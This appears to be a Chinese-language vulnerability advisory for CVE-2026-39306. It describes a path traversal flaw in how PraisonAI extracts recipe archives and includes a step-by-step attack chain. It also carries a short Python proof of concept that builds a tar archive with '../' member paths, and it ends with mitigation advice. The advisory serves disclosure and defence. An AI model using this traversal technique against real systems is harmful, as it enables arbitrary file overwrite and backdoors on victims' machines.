CVE-2026-39306 CVSS 7.3 高危

CVE-2026-39306 PraisonAI 路径遍历漏洞

披露日期: 2026-04-07

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-39306

漏洞类型

路径遍历, 任意文件写入

CVSS评分

7.3 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

需要交互 (UI:R)

影响产品

PraisonAI

漏洞概述

PraisonAI 1.5.113之前版本存在路径遍历漏洞。攻击者可利用恶意.praison tar归档，通过../序列在用户拉取配方时将文件写入输出目录外。校验和验证无法拦截此漏洞，因恶意载荷位于签名包内。

技术细节

该漏洞源于PraisonAI在配方注册表拉取流程中使用了不安全的解压操作。系统直接调用`tar.extractall()`提取攻击者控制的.praison归档文件，且未对归档成员路径进行标准化校验。攻击者可在归档中植入包含`../`遍历序列的文件名，诱导受害者拉取。解压时，文件将被写入预期目录之外的任意路径，实现客户端任意文件写入。由于恶意载荷是签名包的一部分，校验和验证机制失效。此问题影响本地和HTTP注册表拉取路径，可能导致系统文件被覆盖或植入后门。

攻击链分析

STEP 1

恶意制作

攻击者创建包含../路径遍历序列的恶意.praison tar归档文件。

STEP 2

上传发布

攻击者将恶意配方包上传到PraisonAI的配方注册表中。

STEP 3

用户拉取

受害者使用PraisonAI客户端拉取该恶意配方包。

STEP 4

不安全解压

客户端在未验证路径的情况下调用tar.extractall()解压文件。

STEP 5

文件写入

恶意文件被写入受害者系统输出目录之外的任意位置。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# Proof of Concept for CVE-2026-39306
# This script demonstrates how a malicious tar archive can be created
# to exploit the path traversal vulnerability in PraisonAI < 1.5.113.

import tarfile
import os

def create_malicious_tar():
    # Create a file to be included in the archive
    payload_content = b"Malicious payload content"
    with open("evil.txt", "wb") as f:
        f.write(payload_content)

    # Create a tar archive
    with tarfile.open("malicious_recipe.praison", "w") as tar:
        # Add a file with a path traversal sequence (../)
        # This will attempt to write to the parent directory upon extraction
        tar.add("evil.txt", arcname="../../../tmp/evil_payload.txt")
    
    print("[+] Malicious tar archive created: malicious_recipe.praison")
    print("[+] Use this file in the recipe registry to test the vulnerability.")

# Note: The vulnerable code in PraisonAI would look something like:
# tar = tarfile.open(file_path)
# tar.extractall(output_dir) # Vulnerable call without path validation
# tar.close()

if __name__ == "__main__":
    create_malicious_tar()

影响范围

PraisonAI < 1.5.113

防御指南

临时缓解措施

暂停从不可信来源拉取配方包，或在沙箱环境中运行PraisonAI以限制文件写入权限。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表